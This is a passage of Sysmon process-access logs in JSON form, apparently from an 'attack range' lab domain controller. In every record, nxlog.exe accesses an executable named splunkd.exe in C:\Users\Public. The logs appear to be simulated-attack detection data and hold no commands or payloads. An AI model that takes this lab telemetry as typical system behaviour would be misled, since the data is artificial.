(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:29.538","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6310,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:30.538\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:30.538","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6311,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:31.538\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:31.538","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6312,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:32.539\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:32.539","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6313,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:33.539\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:33.539","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6314,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:34.539\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:34.539","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6315,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:35.539\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:35.539","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
